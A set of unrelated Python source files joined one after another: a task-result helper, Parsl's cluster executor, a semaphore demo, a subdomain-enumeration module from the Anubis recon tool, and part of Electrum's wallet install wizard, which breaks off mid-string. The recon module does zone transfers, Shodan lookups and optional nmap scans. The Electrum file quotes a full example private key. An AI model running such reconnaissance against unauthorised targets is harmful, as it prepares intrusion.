self.__value = None self.__result_set = False self.__exception = None def set_value(self, value): """ Set the result value. Can only be called once. """ if self.__result_set: raise Exception("Result already set") self.__value = value self.__result_set = True def set_exception(self, exception): if self.__exception != None: raise Exception("Exception already set") self.__exception = exception self.__result_set = True def retrieve_result(self): if not self.__result_set: raise Exception("Result wasn't set") if self.__exception: raise self.__exception return self.__value class AsyncResult: """ Binds result and its task creating an asynchronous result. Use a new task on any executor with dependency to this result to retrieve the value. """ def __init__(self, result: Result, task: Task): self.result = result self.task = task # TODO: Offer retrieval using blocking operation (temporary executor) (using dependency notificaiton?) def retrieve_result(self): if not self.task.done: raise Exception("Task wasn't yet executed") return self.result.retrieve_result() # TODO: Delete, this functionality should be provided natively by executor. def wrap_async_task(funcTask, *args) -> AsyncResult: """ Helper (to be deprecated) for wrapping a function taking result and executor and creating AsyncResult out of it. The function is responsible to set the result. """ result = Result() task = Task(partial(funcTask, *args, result)) return AsyncResult(result, task) # TODO: Accept async results natively in the executor def async_deps(list: List[AsyncResult]) -> List[Task]: """ Helper (to be deprecated) to extract task list from multiple async results. """ return [result.task for result in list]
executor.py
from concurrent.futures import Future import typeguard import logging import threading import queue import pickle from multiprocessing import Process, Queue from typing import Dict, List, Optional, Tuple, Union import math from ipyparallel.serialize import pack_apply_message from ipyparallel.serialize import deserialize_object from parsl.app.errors import RemoteExceptionWrapper from parsl.executors.high_throughput import zmq_pipes from parsl.executors.high_throughput import interchange from parsl.executors.errors import ( BadMessage, ScalingFailed, DeserializationError, SerializationError, UnsupportedFeatureError ) from parsl.executors.status_handling import StatusHandlingExecutor from parsl.providers.provider_base import ExecutionProvider from parsl.data_provider.staging import Staging from parsl.addresses import get_all_addresses from parsl.utils import RepresentationMixin from parsl.providers import LocalProvider logger = logging.getLogger(__name__) BUFFER_THRESHOLD = 1024 * 1024 ITEM_THRESHOLD = 1024 class HighThroughputExecutor(StatusHandlingExecutor, RepresentationMixin): """Executor designed for cluster-scale The HighThroughputExecutor system has the following components: 1. The HighThroughputExecutor instance which is run as part of the Parsl script. 2. The Interchange which is acts as a load-balancing proxy between workers and Parsl 3. The multiprocessing based worker pool which coordinates task execution over several cores on a node. 4. ZeroMQ pipes connect the HighThroughputExecutor, Interchange and the process_worker_pool Here is a diagram .. code:: python | Data | Executor | Interchange | External Process(es) | Flow | | | Task | Kernel | | | +----->|-------->|------------>|->outgoing_q---|-> process_worker_pool | | | | batching | | | Parsl<---Fut-| | | load-balancing| result exception ^ | | | watchdogs | | | | | | Q_mngmnt | | V V | | | Thread<--|-incoming_q<---|--- +---------+ | | | | | | | | | | | | +----update_fut-----+ Each of the workers in each process_worker_pool has access to its local rank through an environmental variable, ``PARSL_WORKER_RANK``. The local rank is unique for each process and is an integer in the range from 0 to the number of workers per in the pool minus 1. The workers also have access to the ID of the worker pool as ``PARSL_WORKER_POOL_ID`` and the size of the worker pool as ``PARSL_WORKER_COUNT``. Parameters ---------- provider : :class:`~parsl.providers.provider_base.ExecutionProvider` Provider to access computation resources. Can be one of :class:`~parsl.providers.aws.aws.EC2Provider`, :class:`~parsl.providers.cobalt.cobalt.Cobalt`, :class:`~parsl.providers.condor.condor.Condor`, :class:`~parsl.providers.googlecloud.googlecloud.GoogleCloud`, :class:`~parsl.providers.gridEngine.gridEngine.GridEngine`, :class:`~parsl.providers.jetstream.jetstream.Jetstream`, :class:`~parsl.providers.local.local.Local`, :class:`~parsl.providers.sge.sge.GridEngine`, :class:`~parsl.providers.slurm.slurm.Slurm`, or :class:`~parsl.providers.torque.torque.Torque`. label : str Label for this executor instance. launch_cmd : str Command line string to launch the process_worker_pool from the provider. The command line string will be formatted with appropriate values for the following values (debug, task_url, result_url, cores_per_worker, nodes_per_block, heartbeat_period ,heartbeat_threshold, logdir). For example: launch_cmd="process_worker_pool.py {debug} -c {cores_per_worker} --task_url={task_url} --result_url={result_url}" address : string An address to connect to the main Parsl process which is reachable from the network in which workers will be running. This can be either a hostname as returned by `hostname` or an IP address. Most login nodes on clusters have several network interfaces available, only some of which can be reached from the compute nodes. By default, the executor will attempt to enumerate and connect through all possible addresses. Setting an address here overrides the default behavior. default=None worker_ports : (int, int) Specify the ports to be used by workers to connect to Parsl. If this option is specified, worker_port_range will not be honored. worker_port_range : (int, int) Worker ports will be chosen between the two integers provided. interchange_port_range : (int, int) Port range used by Parsl to communicate with the Interchange. working_dir : str Working dir to be used by the executor. worker_debug : Bool Enables worker debug logging. managed : Bool If this executor is managed by the DFK or externally handled. cores_per_worker : float cores to be assigned to each worker. Oversubscription is possible by setting cores_per_worker < 1.0. Default=1 mem_per_worker : float GB of memory required per worker. If this option is specified, the node manager will check the available memory at startup and limit the number of workers such that the there's sufficient memory for each worker. Default: None max_workers : int Caps the number of workers launched by the manager. Default: infinity prefetch_capacity : int Number of tasks that could be prefetched over available worker capacity. When there are a few tasks (<100) or when tasks are long running, this option should be set to 0 for better load balancing. Default is 0. address_probe_timeout : int | None Managers attempt connecting over many different addesses to determine a viable address. This option sets a time limit in seconds on the connection attempt. Default of None implies 30s timeout set on worker. heartbeat_threshold : int Seconds since the last message from the counterpart in the communication pair: (interchange, manager) after which the counterpart is assumed to be un-available. Default: 120s heartbeat_period : int Number of seconds after which a heartbeat message indicating liveness is sent to the counterpart (interchange, manager). Default: 30s poll_period : int Timeout period to be used by the executor components in milliseconds. Increasing poll_periods trades performance for cpu efficiency. Default: 10ms worker_logdir_root : string In case of a remote file system, specify the path to where logs will be kept. """ @typeguard.typechecked def __init__(self, label: str = 'HighThroughputExecutor', provider: ExecutionProvider = LocalProvider(), launch_cmd: Optional[str] = None, address: Optional[str] = None, worker_ports: Optional[Tuple[int, int]] = None, worker_port_range: Optional[Tuple[int, int]] = (54000, 55000), interchange_port_range: Optional[Tuple[int, int]] = (55000, 56000), storage_access: Optional[List[Staging]] = None, working_dir: Optional[str] = None, worker_debug: bool = False, cores_per_worker: float = 1.0, mem_per_worker: Optional[float] = None, max_workers: Union[int, float] = float('inf'), prefetch_capacity: int = 0, heartbeat_threshold: int = 120, heartbeat_period: int = 30, poll_period: int = 10, address_probe_timeout: Optional[int] = None, managed: bool = True, worker_logdir_root: Optional[str] = None): logger.debug("Initializing HighThroughputExecutor") StatusHandlingExecutor.__init__(self, provider) self.label = label self.launch_cmd = launch_cmd self.worker_debug = worker_debug self.storage_access = storage_access self.working_dir = working_dir self.managed = managed self.blocks = {} # type: Dict[str, str] self.cores_per_worker = cores_per_worker self.mem_per_worker = mem_per_worker self.max_workers = max_workers self.prefetch_capacity = prefetch_capacity self.address = address self.address_probe_timeout = address_probe_timeout if self.address: self.all_addresses = address else: self.all_addresses = ','.join(get_all_addresses()) mem_slots = max_workers cpu_slots = max_workers if hasattr(self.provider, 'mem_per_node') and \ self.provider.mem_per_node is not None and \ mem_per_worker is not None and \ mem_per_worker > 0: mem_slots = math.floor(self.provider.mem_per_node / mem_per_worker) if hasattr(self.provider, 'cores_per_node') and \ self.provider.cores_per_node is not None: cpu_slots = math.floor(self.provider.cores_per_node / cores_per_worker) self.workers_per_node = min(max_workers, mem_slots, cpu_slots) if self.workers_per_node == float('inf'): self.workers_per_node = 1 # our best guess-- we do not have any provider hints self._task_counter = 0 self.hub_address = None # set to the correct hub address in dfk self.hub_port = None # set to the correct hub port in dfk self.worker_ports = worker_ports self.worker_port_range = worker_port_range self.interchange_port_range = interchange_port_range self.heartbeat_threshold = heartbeat_threshold self.heartbeat_period = heartbeat_period self.poll_period = poll_period self.run_dir = '.' self.worker_logdir_root = worker_logdir_root if not launch_cmd: self.launch_cmd = ("process_worker_pool.py {debug} {max_workers} " "-a {addresses} " "-p {prefetch_capacity} " "-c {cores_per_worker} " "-m {mem_per_worker} " "--poll {poll_period} " "--task_port={task_port} " "--result_port={result_port} " "--logdir={logdir} " "--block_id={{block_id}} " "--hb_period={heartbeat_period} " "{address_probe_timeout_string} " "--hb_threshold={heartbeat_threshold} ") def initialize_scaling(self): """ Compose the launch command and call the scale_out This should be implemented in the child classes to take care of executor specific oddities. """ debug_opts = "--debug" if self.worker_debug else "" max_workers = "" if self.max_workers == float('inf') else "--max_workers={}".format(self.max_workers) address_probe_timeout_string = "" if self.address_probe_timeout: address_probe_timeout_string = "--address_probe_timeout={}".format(self.address_probe_timeout) worker_logdir = "{}/{}".format(self.run_dir, self.label) if self.worker_logdir_root is not None: worker_logdir = "{}/{}".format(self.worker_logdir_root, self.label) l_cmd = self.launch_cmd.format(debug=debug_opts, prefetch_capacity=self.prefetch_capacity, address_probe_timeout_string=address_probe_timeout_string, addresses=self.all_addresses, task_port=self.worker_task_port, result_port=self.worker_result_port, cores_per_worker=self.cores_per_worker, mem_per_worker=self.mem_per_worker, max_workers=max_workers, nodes_per_block=self.provider.nodes_per_block, heartbeat_period=self.heartbeat_period, heartbeat_threshold=self.heartbeat_threshold, poll_period=self.poll_period, logdir=worker_logdir) self.launch_cmd = l_cmd logger.debug("Launch command: {}".format(self.launch_cmd)) self._scaling_enabled = True logger.debug("Starting HighThroughputExecutor with provider:\n%s", self.provider) if hasattr(self.provider, 'init_blocks'): try: self.scale_out(blocks=self.provider.init_blocks) except Exception as e: logger.error("Scaling out failed: {}".format(e)) raise e def start(self): """Create the Interchange process and connect to it. """ self.outgoing_q = zmq_pipes.TasksOutgoing("127.0.0.1", self.interchange_port_range) self.incoming_q = zmq_pipes.ResultsIncoming("127.0.0.1", self.interchange_port_range) self.command_client = zmq_pipes.CommandClient("127.0.0.1", self.interchange_port_range) self.is_alive = True self._queue_management_thread = None self._start_queue_management_thread() self._start_local_queue_process() logger.debug("Created management thread: {}".format(self._queue_management_thread)) self.initialize_scaling() def _queue_management_worker(self): """Listen to the queue for task status messages and handle them. Depending on the message, tasks will be updated with results, exceptions, or updates. It expects the following messages: .. code:: python { "task_id" : <task_id> "result" : serialized result object, if task succeeded ... more tags could be added later } { "task_id" : <task_id> "exception" : serialized exception object, on failure } We do not support these yet, but they could be added easily. .. code:: python { "task_id" : <task_id> "cpu_stat" : <> "mem_stat" : <> "io_stat" : <> "started" : tstamp } The `None` message is a die request. """ logger.debug("[MTHREAD] queue management worker starting") while not self.bad_state_is_set: try: msgs = self.incoming_q.get(timeout=1) except queue.Empty: logger.debug("[MTHREAD] queue empty") # Timed out. pass except IOError as e: logger.exception("[MTHREAD] Caught broken queue with exception code {}: {}".format(e.errno, e)) return except Exception as e: logger.exception("[MTHREAD] Caught unknown exception: {}".format(e)) return else: if msgs is None: logger.debug("[MTHREAD] Got None, exiting") return else: for serialized_msg in msgs: try: msg = pickle.loads(serialized_msg) tid = msg['task_id'] except pickle.UnpicklingError: raise BadMessage("Message received could not be unpickled") except Exception: raise BadMessage("Message received does not contain 'task_id' field") if tid == -1 and 'exception' in msg: logger.warning("Executor shutting down due to exception from interchange") exception, _ = deserialize_object(msg['exception']) self.set_bad_state_and_fail_all(exception) break task_fut = self.tasks[tid] if 'result' in msg: result, _ = deserialize_object(msg['result']) task_fut.set_result(result) elif 'exception' in msg: try: s, _ = deserialize_object(msg['exception']) # s should be a RemoteExceptionWrapper... so we can reraise it if isinstance(s, RemoteExceptionWrapper): try: s.reraise() except Exception as e: task_fut.set_exception(e) elif isinstance(s, Exception): task_fut.set_exception(s) else: raise ValueError("Unknown exception-like type received: {}".format(type(s))) except Exception as e: # TODO could be a proper wrapped exception? task_fut.set_exception( DeserializationError("Received exception, but handling also threw an exception: {}".format(e))) else: raise BadMessage("Message received is neither result or exception") if not self.is_alive: break logger.info("[MTHREAD] queue management worker finished") # When the executor gets lost, the weakref callback will wake up # the queue management thread. def weakref_cb(self, q=None): """We do not use this yet.""" q.put(None) def _start_local_queue_process(self): """ Starts the interchange process locally Starts the interchange process locally and uses an internal command queue to get the worker task and result ports that the interchange has bound to. """ comm_q = Queue(maxsize=10) self.queue_proc = Process(target=interchange.starter, args=(comm_q,), kwargs={"client_ports": (self.outgoing_q.port, self.incoming_q.port, self.command_client.port), "worker_ports": self.worker_ports, "worker_port_range": self.worker_port_range, "hub_address": self.hub_address, "hub_port": self.hub_port, "logdir": "{}/{}".format(self.run_dir, self.label), "heartbeat_threshold": self.heartbeat_threshold, "poll_period": self.poll_period, "logging_level": logging.DEBUG if self.worker_debug else logging.INFO }, daemon=True, name="HTEX-Interchange" ) self.queue_proc.start() try: (self.worker_task_port, self.worker_result_port) = comm_q.get(block=True, timeout=120) except queue.Empty: logger.error("Interchange has not completed initialization in 120s. Aborting") raise Exception("Interchange failed to start") def _start_queue_management_thread(self): """Method to start the management thread as a daemon. Checks if a thread already exists, then starts it. Could be used later as a restart if the management thread dies. """ if self._queue_management_thread is None: logger.debug("Starting queue management thread") self._queue_management_thread = threading.Thread(target=self._queue_management_worker, name="HTEX-Queue-Management-Thread") self._queue_management_thread.daemon = True self._queue_management_thread.start() logger.debug("Started queue management thread") else: logger.debug("Management thread already exists, returning") def hold_worker(self, worker_id): """Puts a worker on hold, preventing scheduling of additional tasks to it. This is called "hold" mostly because this only stops scheduling of tasks, and does not actually kill the worker. Parameters ---------- worker_id : str Worker id to be put on hold """ c = self.command_client.run("HOLD_WORKER;{}".format(worker_id)) logger.debug("Sent hold request to worker: {}".format(worker_id)) return c @property def outstanding(self): outstanding_c = self.command_client.run("OUTSTANDING_C") return outstanding_c @property def connected_workers(self): workers = self.command_client.run("WORKERS") return workers @property def connected_managers(self): workers = self.command_client.run("MANAGERS") return workers def _hold_block(self, block_id): """ Sends hold command to all managers which are in a specific block Parameters ---------- block_id : str Block identifier of the block to be put on hold """ managers = self.connected_managers for manager in managers: if manager['block_id'] == block_id: logger.debug("[HOLD_BLOCK]: Sending hold to manager: {}".format(manager['manager'])) self.hold_worker(manager['manager']) def submit(self, func, resource_specification, *args, **kwargs): """Submits work to the the outgoing_q. The outgoing_q is an external process listens on this queue for new work. This method behaves like a submit call as described here `Python docs: <https://docs.python.org/3/library/concurrent.futures.html#concurrent.futures.ThreadPoolExecutor>`_ Args: - func (callable) : Callable function - *args (list) : List of arbitrary positional arguments. Kwargs: - **kwargs (dict) : A dictionary of arbitrary keyword args for func. Returns: Future """ if resource_specification: logger.error("Ignoring the resource specification. " "Parsl resource specification is not supported in HighThroughput Executor. " "Please check WorkQueueExecutor if resource specification is needed.") raise UnsupportedFeatureError('resource specification', 'HighThroughput Executor', 'WorkQueue Executor') if self.bad_state_is_set: raise self.executor_exception self._task_counter += 1 task_id = self._task_counter # handle people sending blobs gracefully args_to_print = args if logger.getEffectiveLevel() >= logging.DEBUG: args_to_print = tuple([arg if len(repr(arg)) < 100 else (repr(arg)[:100] + '...') for arg in args]) logger.debug("Pushing function {} to queue with args {}".format(func, args_to_print)) self.tasks[task_id] = Future() try: fn_buf = pack_apply_message(func, args, kwargs, buffer_threshold=1024 * 1024, item_threshold=1024) except TypeError: raise SerializationError(func.__name__) msg = {"task_id": task_id, "buffer": fn_buf} # Post task to the the outgoing queue self.outgoing_q.put(msg) # Return the future return self.tasks[task_id] @property def scaling_enabled(self): return self._scaling_enabled def scale_out(self, blocks=1): """Scales out the number of blocks by "blocks" Raises: NotImplementedError """ r = [] for i in range(blocks): external_block_id = str(len(self.blocks)) launch_cmd = self.launch_cmd.format(block_id=external_block_id) internal_block = self.provider.submit(launch_cmd, 1) logger.debug("Launched block {}->{}".format(external_block_id, internal_block)) if not internal_block: raise(ScalingFailed(self.provider.label, "Attempts to provision nodes via provider has failed")) r.extend([external_block_id]) self.blocks[external_block_id] = internal_block return r def scale_in(self, blocks=None, block_ids=[]): """Scale in the number of active blocks by specified amount. The scale in method here is very rude. It doesn't give the workers the opportunity to finish current tasks or cleanup. This is tracked in issue #530 Parameters ---------- blocks : int Number of blocks to terminate and scale_in by block_ids : list List of specific block ids to terminate. Optional Raises: NotImplementedError """ if block_ids: block_ids_to_kill = block_ids else: block_ids_to_kill = list(self.blocks.keys())[:blocks] # Hold the block for block_id in block_ids_to_kill: self._hold_block(block_id) # Now kill via provider to_kill = [self.blocks.pop(bid) for bid in block_ids_to_kill] r = self.provider.cancel(to_kill) return self._filter_scale_in_ids(to_kill, r) def _get_job_ids(self) -> List[object]: return list(self.blocks.values()) def shutdown(self, hub=True, targets='all', block=False): """Shutdown the executor, including all workers and controllers. This is not implemented. Kwargs: - hub (Bool): Whether the hub should be shutdown, Default: True, - targets (list of ints| 'all'): List of block id's to kill, Default: 'all' - block (Bool): To block for confirmations or not Raises: NotImplementedError """ logger.info("Attempting HighThroughputExecutor shutdown") self.queue_proc.terminate() logger.info("Finished HighThroughputExecutor shutdown attempt") return True
semaphores.py
import threading class Queue(): def __init__(self, n): self.available_spots = threading.Semaphore(n) self.content = [] def add(self, x): self.available_spots.acquire() self.content.append(x) def pop(self): x = self.content.pop(0) self.available_spots.release() return x def production(q, base): for i in range (100): q.add('{}.{}'.format(base, i)) def consumption(q): for _ in range(100): print(q.pop()) if __name__ == '__main__': q = Queue(10) n = 5 prod = [threading.Thread(target=production, args=(q,i)) for i in range(n)] conso = [threading.Thread(target=consumption, args=(q,)) for i in range(n)] for t in prod: t.start() for t in conso: t.start() # TODO: increase conso
target.py
"""The target command.""" import os import re import socket import sys import threading from urllib.parse import urlsplit from anubis.scanners.anubis_db import search_anubisdb, send_to_anubisdb from anubis.scanners.crt import search_crtsh from anubis.scanners.dnsdumpster import search_dnsdumpster from anubis.scanners.dnssec import dnssecc_subdomain_enum from anubis.scanners.hackertarget import subdomain_hackertarget from anubis.scanners.netcraft import search_netcraft from anubis.scanners.nmap import scan_host from anubis.scanners.recursive import recursive_search from anubis.scanners.shodan import search_shodan from anubis.scanners.spyse import search_spyse from anubis.scanners.ssl import search_subject_alt_name from anubis.scanners.sublist3r import search_sublist3r from anubis.scanners.zonetransfer import dns_zonetransfer from anubis.utils.color_print import ColorPrint from .base import Base class Target(Base): """Main enumeration module""" domains = list() dedupe = set() stdout = sys.stdout def handle_exception(self, e, message=""): if self.options["--verbose"]: print(e) if message: ColorPrint.red(message) def init(self): if self.options["FILE"]: full_path = os.path.join(os.getcwd(), self.options["FILE"]) with open(full_path) as file: self.options["TARGET"] = list(filter(None, file.read().split('\n'))) else: self.options["TARGET"] = list( filter(None, self.options["TARGET"].split(","))) # Clean up targets for i in range(len(self.options["TARGET"])): url = self.options["TARGET"][i] # Inject protocol if not there if not re.match(r'http(s?):', url): url = 'http://' + url parsed = urlsplit(url) host = parsed.netloc self.options["TARGET"][i] = host try: ip_str = socket.gethostbyname(host) ColorPrint.green(f"Searching for subdomains for {ip_str} ({host})") except Exception as e: self.handle_exception(e, "Error connecting to target! Make sure you spelled it correctly and it is a resolvable address") def run(self): # Retrieve IP of target and run initial configurations self.init() # If multiple targets, create scans for each for i in range(len(self.options["TARGET"])): # Default scans that run every time target = self.options["TARGET"][i] ColorPrint.green(f"Working on target: {target}") threads = [threading.Thread(target=dns_zonetransfer, args=(self, target)), threading.Thread(target=search_sublist3r, args=(self, target)), threading.Thread(target=subdomain_hackertarget, args=(self, target)), threading.Thread(target=search_subject_alt_name, args=(self, target)), threading.Thread(target=search_netcraft, args=(self, target)), threading.Thread(target=search_crtsh, args=(self, target)), threading.Thread(target=search_dnsdumpster, args=(self, target)), threading.Thread(target=search_spyse, args=(self, target)), threading.Thread(target=search_anubisdb, args=(self, target))] # Additional options - shodan.io scan if self.options["--additional-info"]: threads.append(threading.Thread(target=search_shodan, args=(self,))) # Additional options - nmap scan of dnssec script and a host/port scan if self.options["--with-nmap"]: threads.append( threading.Thread(target=dnssecc_subdomain_enum, args=(self, target))) threads.append(threading.Thread(target=scan_host, args=(self, target))) # Start all threads and wait for them to finish for x in threads: x.start() for x in threads: x.join() # Run a recursive search on each subdomain - rarely useful, but nice to have # just in case if self.options["--recursive"]: recursive_search(self) # remove duplicates and clean up self.domains = self.clean_domains(self.domains) self.dedupe = set(self.domains) print("Found", len(self.dedupe), "subdomains") print("----------------") if self.options["--ip"]: self.resolve_ips() else: for domain in self.dedupe: cleaned_domain = domain.strip() ColorPrint.green(cleaned_domain) if self.options['--silent']: sys.stdout.write(cleaned_domain + '\n', override=True) if not self.options["--dont-send-to-anubis-db"]: send_to_anubisdb(self, [target]) # reset per domain self.domains = list() def resolve_ips(self): unique_ips = set() for domain in self.dedupe: try: # Attempt to get IP resolved_ip = socket.gethostbyname(domain) except Exception as e: # If getting IP fails, fallback to empty string resolved_ip = "" # TODO - Align domains and ips in stdout ColorPrint.green(domain + ": " + resolved_ip) if self.options['--silent']: sys.stdout.write(domain + '\n', override=True) if resolved_ip: unique_ips.add(resolved_ip) print("Found %s unique IPs" % len(unique_ips)) for ip in unique_ips: # Ignore empty strings, final sanity check if ip: ColorPrint.green(ip) @staticmethod def clean_domains(domains): cleaned = [] for subdomain in domains: subdomain = subdomain.lower() if subdomain.find("//") != -1: subdomain = subdomain[subdomain.find("//") + 2:] # Some pkey return instances like example.com. - remove the final . if subdomain.endswith('.'): subdomain = subdomain[:-1] # sometimes we'll get something like /www.example.com if subdomain[0] in ["\\", ".", "/", "#", "$", "%"]: subdomain = subdomain[1:] # If it's an email address, only take the domain part if "@" in subdomain: subdomain = subdomain.split("@") # If it's an actual email like mail@example.com, take example.com if len(subdomain) > 1: subdomain = subdomain[1] else: # If for some reason it's example.com@, take example.com subdomain = subdomain[0] cleaned.append(subdomain.strip()) return cleaned
installwizard.py
# Copyright (C) 2018 The Electrum developers # Distributed under the MIT software license, see the accompanying # file LICENCE or http://www.opensource.org/licenses/mit-license.php import os import sys import threading import traceback from typing import Tuple, List, Callable from PyQt5.QtCore import QRect, QEventLoop, Qt, pyqtSignal from PyQt5.QtGui import QPalette, QPen, QPainter, QPixmap from PyQt5.QtWidgets import (QWidget, QDialog, QLabel, QHBoxLayout, QMessageBox, QVBoxLayout, QLineEdit, QFileDialog, QPushButton, QGridLayout, QSlider, QScrollArea) from electrum.wallet import Wallet from electrum.storage import WalletStorage from electrum.util import UserCancelled, InvalidPassword from electrum.base_wizard import BaseWizard, HWD_SETUP_DECRYPT_WALLET, GoBack from electrum.i18n import _ from .seed_dialog import SeedLayout, KeysLayout from .network_dialog import NetworkChoiceLayout from .util import (MessageBoxMixin, Buttons, icon_path, ChoicesLayout, WWLabel, InfoButton) from .password_dialog import PasswordLayout, PasswordLayoutForHW, PW_NEW MSG_ENTER_PASSWORD = _("Choose a password to encrypt your wallet keys.") + '\n'\ + _("Leave this field empty if you want to disable encryption.") MSG_HW_STORAGE_ENCRYPTION = _("Set wallet file encryption.") + '\n'\ + _("Your wallet file does not contain secrets, mostly just metadata. ") \ + _("It also contains your master public key that allows watching your addresses.") + '\n\n'\ + _("Note: If you enable this setting, you will need your hardware device to open your wallet.") WIF_HELP_TEXT = (_('WIF keys are typed in Electrum, based on script type.') + '\n\n' + _('A few examples') + ':\n' + 'p2pkh:KxZcY47uGp9a... \t-> 1DckmggQM...\n' + 'p2wpkh-p2sh:KxZcY47uGp9a... \t-> 3NhNeZQXF...\n' + 'p2wpkh:KxZcY47uGp9a... \t-> bc1q3fjfk...') # note: full key is KxZcY47uGp9aVQAb6VVvuBs8SwHKgkSR2DbZUzjDzXf2N2GPhG9n MSG_PASSPHRASE_WARN_ISSUE4566 = _("Warning") + ": "\ + _("You have multiple consecutive whitespaces or leading/trailing " "whitespaces in your passphrase.") + " " \ + _("This is discouraged.") + " " \ + _("Due to a bug, old versions of Electrum will NOT be creating the " "same wallet as newer versions or other software.") class CosignWidget(QWidget): size = 120 def __init__(self, m, n): QWidget.__init__(self) self.R = QRect(0, 0, self.size, self.size) self.setGeometry(self.R) self.setMinimumHeight(self.size) self.setMaximumHeight(self.size) self.m = m self.n = n def set_n(self, n): self.n = n self.update() def set_m(self, m): self.m = m self.update() def paintEvent(self, event): bgcolor = self.palette().color(QPalette.Background) pen = QPen(bgcolor, 7, Qt.SolidLine) qp = QPainter() qp.begin(self) qp.setPen(pen) qp.setRenderHint(QPainter.Antialiasing) qp.setBrush(Qt.gray) for i in range(self.n): alpha = int(16* 360 * i/self.n) alpha2 = int(16* 360 * 1/self.n) qp.setBrush(Qt.green if i<self.m else Qt.gray) qp.drawPie(self.R, alpha, alpha2) qp.end() def wizard_dialog(func): def func_wrapper(*args, **kwargs): run_next = kwargs['run_next'] wizard = args[0] wizard.back_button.setText(_('Back') if wizard.can_go_back() else _('Cancel')) try: out = func(*args, **kwargs) except GoBack: wizard.go_back() if wizard.can_go_back() else wizard.close() return except UserCancelled: return #if out is None: # out = () if type(out) is not tuple: out = (out,) run_next(*out) return func_wrapper # WindowModalDialog must come first as it overrides show_error class InstallWizard(QDialog, MessageBoxMixin, BaseWizard): accept_signal = pyqtSignal() def __init__(self, config, app, plugins, storage): BaseWizard.__init__(self, config, plugins, storage) QDialog.__init__(self, None) self.setWindowTitle('Electrum - ' + _('Install Wizard')) self.app = app self.config = config # Set for base base class self.language_for_seed = config.get('language') self.setMinimumSize(600, 400) self.accept_signal.connect(self.accept) self.title = QLabel() self.main_widget = QWidget() self.back_button = QPushButton(_("Back"), self) self.back_button.setText(_('Back') if self.can_go_back() else _('Cancel')) self.next_button = QPushButton(_("Next"), self) self.next_button.setDefault(True) self.logo = QLabel() self.please_wait = QLabel(_("Please wait...")) self.please_wait.setAlignment(Qt.AlignCenter) self.icon_filename = None self.loop = QEventLoop() self.rejected.connect(lambda: self.loop.exit(0)) self.back_button.clicked.connect(lambda: self.loop.exit(1)) self.next_button.clicked.connect(lambda: self.loop.exit(2)) outer_vbox = QVBoxLayout(self) inner_vbox = QVBoxLayout() inner_vbox.addWidget(self.title) inner_vbox.addWidget(self.main_widget) inner_vbox.addStretch(1) inner_vbox.addWidget(self.please_wait) inner_vbox.addStretch(1) scroll_widget = QWidget() scroll_widget.setLayout(inner_vbox) scroll = QScrollArea() scroll.setWidget(scroll_widget) scroll.setHorizontalScrollBarPolicy(Qt.ScrollBarAlwaysOff) scroll.setWidgetResizable(True) icon_vbox = QVBoxLayout() icon_vbox.addWidget(self.logo) icon_vbox.addStretch(1) hbox = QHBoxLayout() hbox.addLayout(icon_vbox) hbox.addSpacing(5) hbox.addWidget(scroll) hbox.setStretchFactor(scroll, 1) outer_vbox.addLayout(hbox) outer_vbox.addLayout(Buttons(self.back_button, self.next_button)) self.set_icon('electrum.png') self.show() self.raise_() self.refresh_gui() # Need for QT on MacOSX. Lame. def select_storage(self, path, get_wallet_from_daemon): vbox = QVBoxLayout() hbox = QHBoxLayout() hbox.addWidget(QLabel(_('Wallet') + ':')) self.name_e = QLineEdit() hbox.addWidget(self.name_e) button = QPushButton(_('Choose...')) hbox.addWidget(button) vbox.addLayout(hbox) self.msg_label = QLabel('') vbox.addWidget(self.msg_label) hbox2 = QHBoxLayout() self.pw_e = QLineEdit('', self) self.pw_e.setFixedWidth(150) self.pw_e.setEchoMode(2) self.pw_label = QLabel(_('Password') + ':') hbox2.addWidget(self.pw_label) hbox2.addWidget(self.pw_e) hbox2.addStretch() vbox.addLayout(hbox2) self.set_layout(vbox, title=_('Electrum wallet')) self.storage = WalletStorage(path, manual_upgrades=True) wallet_folder = os.path.dirname(self.storage.path) def on_choose(): path, __ = QFileDialog.getOpenFileName(self, "Select your wallet file", wallet_folder) if path: self.name_e.setText(path) def on_filename(filename): path = os.path.join(wallet_folder, filename) wallet_from_memory = get_wallet_from_daemon(path) try: if wallet_from_memory: self.storage = wallet_from_memory.storage else: self.storage = WalletStorage(path, manual_upgrades=True) self.next_button.setEnabled(True) except BaseException: traceback.print_exc(file=sys.stderr) self.storage = None self.next_button.setEnabled(False) if self.storage: if not self.storage.file_exists(): msg =_("This file does not exist.") + '\n' \ + _("Press 'Next' to create this wallet, or choose another file.") pw = False elif not wallet_from_memory: if self.storage.is_encrypted_with_user_pw(): msg = _("This file is encrypted with a password.") + '\n' \ + _('Enter your password or choose another file.') pw = True elif self.storage.is_encrypted_with_hw_device(): msg = _("This file is encrypted using a hardware device.") + '\n' \ + _("Press 'Next' to choose device to decrypt.") pw = False else: msg = _("Press 'Next' to open this wallet.") pw = False else: msg = _("This file is already open in memory.") + "\n" \ + _("Press 'Next' to create/focus window.") pw = False else: msg = _('Cannot read file') pw = False self.msg_label.setText(msg) if pw: self.pw_label.show() self.pw_e.show() self.pw_e.setFocus() else: self.pw_label.hide() self.pw_e.hide() button.clicked.connect(on_choose) self.name_e.textChanged.connect(on_filename) n = os.path.basename(self.storage.path) self.name_e.setText(n) while True: if self.loop.exec_() != 2: # 2 = next return if self.storage.file_exists() and not self.storage.is_encrypted(): break if not self.storage.file_exists(): break wallet_from_memory = get_wallet_from_daemon(self.storage.path) if wallet_from_memory: return wallet_from_memory if self.storage.file_exists() and self.storage.is_encrypted(): if self.storage.is_encrypted_with_user_pw(): password = self.pw_e.text() try: self.storage.decrypt(password) break except InvalidPassword as e: QMessageBox.information(None, _('Error'), str(e)) continue except BaseException as e: traceback.print_exc(file=sys.stdout) QMessageBox.information(None, _('Error'), str(e)) return elif self.storage.is_encrypted_with_hw_device(): try: self.run('choose_hw_device', HWD_SETUP_DECRYPT_WALLET) except InvalidPassword as e: QMessageBox.information( None, _('Error'), _('Failed to decrypt using this hardware device.') + '\n' + _('If you use a passphrase, make sure it is correct.')) self.reset_stack() return self.select_storage(path, get_wallet_from_daemon) except BaseException as e: traceback.print_exc(file=sys.stdout) QMessageBox.information(None, _('Error'), str(e)) return if self.storage.is_past_initial_decryption(): break else: return else: raise Exception('Unexpected encryption version') return True def run_and_get_wallet(self): path = self.storage.path if self.storage.requires_split(): self.hide() msg = _("The wallet '{}' contains multiple accounts, which are no longer supported since Electrum 2.7.\n\n" "Do you want to split your wallet into multiple files?").format(path) if not self.question(msg): return file_list = '\n'.join(self.storage.split_accounts()) msg = _('Your accounts have been moved to') + ':\n' + file_list + '\n\n'+ _('Do you want to delete the old file') + 